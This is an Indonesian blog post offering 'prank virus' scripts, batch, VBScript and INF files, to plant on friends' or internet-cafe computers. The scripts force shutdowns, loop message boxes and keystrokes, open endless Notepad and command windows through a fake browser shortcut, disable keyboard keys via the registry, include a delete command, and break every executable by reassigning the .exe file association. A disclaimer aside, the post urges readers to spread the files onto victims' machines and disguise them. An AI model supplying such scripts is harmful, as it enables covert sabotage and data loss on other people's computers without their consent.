Skip to content Skip to sidebar Skip to footer

Widget HTML #1

Cara Membuat Virus Computer - Prank

Cara Membuat Virus Computer - Prank
Cara Membuat Virus Computer - Prank

Cara Membuat Virus Computer
- Hallo sobat clay kali ini saya akan membagikan cara "jahil/prank" karena kita ingin tahu, belajar atau kalian yang ingin membalas perbuatan teman sobat karena kalian pernah kena prank virus ini juga hehe, memang sangat menjengkelkan.

Virus ini bukan benar benar virus alias prank saja, tetapi tidak menutup kemungkian perangkat kalian rusak, jadi erhati-hati lah saat mencobanya.

Dislaimer : Segala bentuk kerusakan, kehilangan atau apapun yang merugikan anda atau orang lai bukan tanggung jawab pihak ClayHack, ambil resikomu sendiri.
Ok langsungsaja ke scrip virusnya, pastikan kalian membuat dengan langkah-langkahnya agar prank ini 100% work.

Komputer / Laptop Mati Otomatis

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s
simpan kode script yang di atas di Notepad dengan nama : xhack.BAT 
type file : All file 
 sebarkan File tersebut di Komputer teman Anda, maka Komputer korban akan otomatis FORCED SHOUTDOWN 


Membuat Tombol Caps Lock menyala terus-menerus

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
seperti cara yang pertama, hanya berbeda kode script simpan kode yang di atas di Notepad dengan nama : xhack.VBS type File : All File sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus (bila dimatikan akan menyala lagi)


Membuat Pesan Jail mucul terus

@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
simpan kode script yang di atas dengan nama xhack.BAT type file : All File Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera


Jail dengan Membuka Tutup CD/DVD room

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File maka DVD/CD roomnya akan membuka dan menutup otomatis, 


Membuat script mucul terus menerus

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File membuat script bermunculan terus menerus 


Membuat Tombol Backspace menjadi eror - menekan terus menerus

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File maka Tombol Backspace akan eror dan menekan dengan sendirinya 


Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Komputer Anda Jelek Banget"
loop
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
simpan di Notepad dengan nama : xhack.BAT maka Notepad akan terbuka terus menerus 


Membuat Notepad dengan Pesan Jail

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "
simpan di Notepad dengan nama : xhack.vbs ganti kode yang di atas sesuai dengan selera anda. TRIK 


Cara Membuat Memilih jawaban seperti Quiz di Notepad

@echo off
title quiz hari ini Smile
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top
simpan kode script berikut di Notepad dengan nama : xhack.BAT TRIK 


Membuat Komputer Hang dengan Kode script Notepad

start
start
start
start
start
start
start
start
start
start
start
start
simpan di Notepad dengan nama : xhack.BAT terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar ) 


Cara Mematikan Tombol Keyboard 

1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF Langsung kita mulai saja :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
AddReg =AIUEO
[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,17,00,00,00,18,00,00,00,16,00,00,00,00,00
2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install 3. Log Off komputernya agar trik ini berfungsi. NB : Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard. Untuk menormalkannya, silahkan salin script berikut :
[Version]
Signature=”$Windows NT$”
[DefaultInstall]
DelReg =normal
[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”
Simpan dengan nama “NORMAL.INF” Klik kanan file ini, pilih >Install Log Off komputernya. 
sumber artikel hack : kidzoom 


Software Buat Jahil - Nakal

Ada 46 software yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini http://www.rjlpranks.com/pranks/ 
sumber artikel : kidzoom 


Cara Merusak Komputer teman / Warnet 

buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter! !!!! program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE

Penutup

Mungkin cukup sekin pembahasan tentangng Cara Membuat Virus Computer - Prank, gunakan materi ini dengan bijak, jangan di salah gunakan atau membuat kerugiang yang cukup bbesar, lakukan dengan resukomu sendiri ya Clayy.. Salam!